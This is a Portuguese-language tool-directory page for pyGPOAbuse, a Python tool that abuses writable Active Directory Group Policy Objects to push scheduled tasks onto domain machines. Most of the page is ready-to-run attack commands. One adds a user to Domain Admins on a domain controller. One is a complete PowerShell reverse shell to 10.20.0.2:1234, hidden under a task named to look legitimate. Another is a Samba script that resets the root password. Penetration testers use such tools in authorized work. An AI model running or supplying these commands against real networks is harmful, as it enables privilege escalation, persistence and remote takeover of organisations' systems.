Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pyGPOAbuse — Implementação parcial em Python do SharpGPOAbuse | Kitploit
Ferramentas/GitHubGitHub/hackndo/pygpoabuse
Escalada de PrivilégiosExploraçãoMovimento LateralPós-ExploraçãoTestes de Penetração
GitHubhackndo/pygpoabuse

pyGPOAbuse

Implementação parcial em Python do SharpGPOAbuse

Ver Repositório
5857112há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

pyGPOAbuse

Adições de Filtro por D4RKMATT3R

  • AVISO: Isso foi testado apenas brevemente em um ambiente AD local. Não me responsabilizo por qualquer comportamento imprevisto ou mau funcionamento; é fornecido como está, apenas para testes autorizados, inteiramente por sua conta e risco.
  • Agora suporta direcionamento filtrado de usuários ou hosts, similar ao SharpGPOAbuse
  • Cenário: A GPO está vinculada ao domínio do Active Directory, portanto as tarefas seriam aplicadas a todos os objetos afetados no domínio (usuários/hosts), o que deixaria uma tonelada de ruído e artefatos desnecessários. Portanto, uma abordagem mais direcionada é preferível, executando comandos em alvos específicos, por exemplo, o controlador de domínio.
Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
  -target-dns-name FQDN
                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
  -target-username DOMAIN\USER
                        User task: only this user processes the task (format: DOMAIN\username)
  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)

Exemplo

# Add Domain user and add to Domain Admins via Domain-Controller
python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local

Descrição

Implementação parcial em Python do SharpGPOAbuse por @pkb1s

Esta ferramenta pode ser usada quando uma conta controlada pode modificar uma GPO existente que se aplica a um ou mais usuários e computadores. Ela criará uma tarefa agendada imediata como SYSTEM no computador remoto para GPO de computador, ou como o usuário logado para GPO de usuário.

O comportamento padrão adiciona um administrador local.

Example

Como usar

Uso básico

Adiciona o usuário john ao grupo de administradores locais (Senha: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Uso avançado

Exemplo de reverse shell

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

Limpeza

Exclui a tarefa agendada após sua execução.

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --cleanup

Uso com Samba AD

Esta ferramenta também pode ser usada com domínios Samba AD. Ela criará um job imediato como root no computador remoto para GPO de computador.

Primeiro, crie um script Bash ou arquivo ELF.

#!/bin/bash
echo "root:1234" | chpasswd

Em seguida, execute a ferramenta com o argumento --linux-exec.

./pygpoabuse.py DOMAIN/user:password -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --linux-exec /path/to/executable

Example

Créditos

  • @pkb1s por SharpGPOAbuse
  • @airman604 por schtask_now.py
  • @SkelSec por msldap
Baixar ferramenta